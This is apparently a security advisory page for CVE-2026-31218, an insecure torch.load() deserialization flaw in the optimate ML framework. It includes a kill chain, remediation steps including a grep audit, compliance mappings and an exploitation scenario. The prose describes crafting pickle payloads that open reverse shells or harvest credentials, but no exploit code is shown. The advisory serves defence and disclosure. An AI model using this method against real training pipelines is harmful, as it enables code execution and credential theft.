CVE-2026-31218 — AWAITING NVD AI Security Vulnerability

CISO Take

The optimate neural network optimization framework contains an insecure deserialization flaw where model state dictionaries are loaded using PyTorch's torch.load() without the weights_only=True safety parameter, enabling arbitrary Python code execution during model loading. This is a well-understood and extensively documented attack class in ML pipelines — crafting a malicious pickle-embedded .pt file requires no advanced skills, meaning the exploitation barrier is trivially low for any attacker who can supply a model file to your training infrastructure. No public exploit exists and the package is not in CISA KEV, but urgency extends beyond optimate itself: this CVE signals a pervasive pattern across ML codebases where insecure torch.load() usage is endemic. Audit all torch.load() calls in your codebase for missing weights_only=True, enforce cryptographic model provenance verification, and evaluate migrating to safetensors format which eliminates pickle-based deserialization entirely.

Sources: NVD GitHub Advisory ATLAS

Risk Assessment

Effective severity is Critical despite no assigned CVSS score — insecure deserialization yielding arbitrary code execution is among the highest-impact vulnerability classes. Exploitation complexity is low once an attacker can deliver a crafted .pt file to the target environment, which is realistic in collaborative ML workflows, shared model repositories, or any pipeline consuming artifacts from external sources. The narrow attack surface (specific to optimate users loading external models via --model) limits immediate blast radius, but the underlying pattern mirrors dozens of similar CVEs across ML tooling and warrants broad codebase audits beyond this single package.

Attack Kill Chain

Artifact Staging

Adversary crafts a malicious state_dict.pt file by serializing a Python object with a __reduce__ method that executes arbitrary code, embedding the payload using Python's pickle module.

AML.T0011.000

Delivery

Malicious .pt file is placed in a directory accessible to the victim via shared storage, model repository, or supply chain compromise; victim specifies this path using the --model argument.

AML.T0010.003

Code Execution

Victim runs neural_magic_training.py; torch.load() without weights_only=True passes the file to Python's pickle module, which instantiates the adversary's object and executes the embedded payload with training process privileges.

AML.T0018.002

Impact

Adversary achieves full code execution on the ML training host, enabling cloud credential theft, training data exfiltration, lateral movement to connected infrastructure, or persistent backdoor installation.

AML.T0112.001

Artifact Staging

Adversary crafts a malicious state_dict.pt file by serializing a Python object with a __reduce__ method that executes arbitrary code, embedding the payload using Python's pickle module.

AML.T0011.000

Delivery

Malicious .pt file is placed in a directory accessible to the victim via shared storage, model repository, or supply chain compromise; victim specifies this path using the --model argument.

AML.T0010.003

Code Execution

Victim runs neural_magic_training.py; torch.load() without weights_only=True passes the file to Python's pickle module, which instantiates the adversary's object and executes the embedded payload with training process privileges.

AML.T0018.002

Impact

Adversary achieves full code execution on the ML training host, enabling cloud credential theft, training data exfiltration, lateral movement to connected infrastructure, or persistent backdoor installation.

AML.T0112.001

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Recommended Action

6 steps

Immediate patch: In neural_magic_training.py and all torch.load() call sites, add weights_only=True to restrict deserialization to safe tensor data only.
Broad codebase audit: Run 'grep -r "torch.load(" . | grep -v "weights_only=True"' across all ML projects to identify the same pattern elsewhere.
Model provenance: Implement SHA-256 hash verification for all model files before loading; maintain a manifest of expected hashes for approved artifacts.
Format migration: Evaluate migrating model storage to safetensors format, which does not use pickle and cannot execute arbitrary code during loading.
Environment hardening: Ensure ML training processes run with least-privilege credentials and cannot reach external networks post-exploitation.
Detection: Monitor for unexpected process spawning, outbound network connections, or file system writes during model loading operations.

Classification

Supply Chain Code Execution Model Training Data AML.T0002.001 - Models AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

8.4 - AI system supply chain

NIST AI RMF

MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components

OWASP LLM Top 10

LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2026-31218?

The optimate neural network optimization framework contains an insecure deserialization flaw where model state dictionaries are loaded using PyTorch's torch.load() without the weights_only=True safety parameter, enabling arbitrary Python code execution during model loading. This is a well-understood and extensively documented attack class in ML pipelines — crafting a malicious pickle-embedded .pt file requires no advanced skills, meaning the exploitation barrier is trivially low for any attacker who can supply a model file to your training infrastructure. No public exploit exists and the package is not in CISA KEV, but urgency extends beyond optimate itself: this CVE signals a pervasive pattern across ML codebases where insecure torch.load() usage is endemic. Audit all torch.load() calls in your codebase for missing weights_only=True, enforce cryptographic model provenance verification, and evaluate migrating to safetensors format which eliminates pickle-based deserialization entirely.

Is CVE-2026-31218 actively exploited?

No confirmed active exploitation of CVE-2026-31218 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-31218?

1. Immediate patch: In neural_magic_training.py and all torch.load() call sites, add weights_only=True to restrict deserialization to safe tensor data only. 2. Broad codebase audit: Run 'grep -r "torch.load(" . | grep -v "weights_only=True"' across all ML projects to identify the same pattern elsewhere. 3. Model provenance: Implement SHA-256 hash verification for all model files before loading; maintain a manifest of expected hashes for approved artifacts. 4. Format migration: Evaluate migrating model storage to safetensors format, which does not use pickle and cannot execute arbitrary code during loading. 5. Environment hardening: Ensure ML training processes run with least-privilege credentials and cannot reach external networks post-exploitation. 6. Detection: Monitor for unexpected process spawning, outbound network connections, or file system writes during model loading operations.

What systems are affected by CVE-2026-31218?

This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Model optimization workflows, Model fine-tuning environments, CI/CD ML artifact pipelines, Collaborative model development environments.

What is the CVSS score for CVE-2026-31218?

No CVSS score has been assigned yet.

Technical Details

NVD Description

The _load_model() function in the neural_magic_training.py script of the optimate project in commit a6d302f912b481c94370811af6b11402f51d377f (2024-07-21) is vulnerable to insecure deserialization (CWE-502). When loading a model state dictionary from a state_dict.pt file via torch.load(), the function does not enable the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects through the Pickle module. A remote attacker can exploit this by providing a maliciously crafted state_dict.pt file within a directory specified via the --model argument, leading to arbitrary code execution during the deserialization process on the victim's system.

Exploitation Scenario

An adversary targeting an organization's ML optimization infrastructure crafts a malicious state_dict.pt file by serializing a Python object whose __reduce__ method executes a reverse shell or credential harvesting command. The attacker uploads this file to a Hugging Face repository, S3 bucket, or shared NFS mount that the victim's training pipeline consumes. When a data scientist or automated CI/CD job runs neural_magic_training.py with --model pointing to the directory containing the malicious file, torch.load() — absent the weights_only safeguard — passes the pickle stream to Python's Pickle module, which instantiates the adversary's object and executes the embedded payload. The training process, often running with cloud IAM permissions scoped to access model stores and training data, then becomes a pivot point for credential theft, lateral movement to other services, or persistent backdoor installation in the ML environment.